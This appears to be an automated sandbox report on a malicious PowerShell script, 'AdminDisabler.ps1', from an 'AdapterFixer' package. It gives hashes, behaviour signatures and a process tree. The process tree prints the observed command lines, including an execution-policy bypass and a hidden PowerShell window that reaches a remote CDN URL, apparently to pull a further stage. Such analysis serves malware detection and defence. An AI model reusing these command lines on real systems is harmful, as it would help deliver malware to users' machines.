Overview

overview

10

Static

static

10

AdapterFix...in.bat

windows10-ltsc 2021-x64

1

AdapterFix...er.ps1

windows10-ltsc 2021-x64

8

AdapterFix...r1.exe

windows10-ltsc 2021-x64

10

AdapterFix...10.exe

windows10-ltsc 2021-x64

10

AdapterFix...r2.exe

windows10-ltsc 2021-x64

10

AdapterFix...r3.exe

windows10-ltsc 2021-x64

10

AdapterFix...r4.exe

windows10-ltsc 2021-x64

10

AdapterFix...r5.exe

windows10-ltsc 2021-x64

10

AdapterFix...r6.exe

windows10-ltsc 2021-x64

10

AdapterFix...r7.exe

windows10-ltsc 2021-x64

10

AdapterFix...r8.exe

windows10-ltsc 2021-x64

10

AdapterFix...r9.exe

windows10-ltsc 2021-x64

10

Analysis

  • max time kernel
    1264s
  • max time network
    1266s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    17-11-2024 18:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    AdapterFixer/AdminDisabler.ps1

  • Size

    193B

  • MD5

    f5cb8323eefad78cf98b62f58f8f6d6c

  • SHA1

    0814d49c14d5fc00119a382120a530ec74c129c5

  • SHA256

    343462169546cbb716a87a1efbd6c5e2ed87a7accbb8ec7235e8489a65442031

  • SHA512

    5351df306f2c5df17e67c712de2ec63acb2cd0dc69ac119f263800864d9cb9694028d92385cc5a923f40e63e6af050dcbda2ba1ab70a2d81ebd9a148126cd3a8

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\AdapterFixer\AdminDisabler.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4064
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -W Hidden -command = https://bot-filter-tx.b-cdn.net/build-variation-1.txt
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2584

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    e30544e6d048b2c1c6129c89835c16dd

    SHA1

    21d167ff64825d3f8a5c351c3160b670dc14cb60

    SHA256

    df0fcfba7ccb03bac0ccf6941f9cc512937fdc63035a2fedc78aa9a82c1d8af1

    SHA512

    fcfc1e2b4110286dc8ede8caab34ea309e24fa6deb225213ab0e5b2d6499cc195e65dde2e125bca3ef5d5b5f4fdda66a1e4429cf2ea1c3df0ba92142342dfd9b

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    104B

    MD5

    f23d2355fab9cea5292f36ff57e9772f

    SHA1

    e89d190ef27768e9312f396ab538814823bb5652

    SHA256

    bab231f4683f8799d1db1445fa3d5d9afd42c94c84ff868a07dbf29f4b1a3d8b

    SHA512

    684b2b263d5de618e51d11c7175adc8c3f3fe19bede62ea3561785401d031b5a17451d835baf82c69667e5ef6af24bf8eaf22f047e5ca2103ac78d7bf99c7345

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eeldymjx.0rm.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/2584-28-0x00007FFDEA9F0000-0x00007FFDEB4B2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2584-23-0x00007FFDEA9F0000-0x00007FFDEB4B2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2584-24-0x00007FFDEA9F0000-0x00007FFDEB4B2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2584-25-0x00007FFDEA9F0000-0x00007FFDEB4B2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2584-29-0x00007FFDEA9F0000-0x00007FFDEB4B2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4064-12-0x00007FFDEA9F0000-0x00007FFDEB4B2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4064-13-0x00007FFDEA9F0000-0x00007FFDEB4B2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4064-0-0x00007FFDEA9F3000-0x00007FFDEA9F5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4064-11-0x00007FFDEA9F0000-0x00007FFDEB4B2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4064-10-0x0000015D631B0000-0x0000015D631D2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4064-33-0x00007FFDEA9F0000-0x00007FFDEB4B2000-memory.dmp

    Filesize

    10.8MB

    Download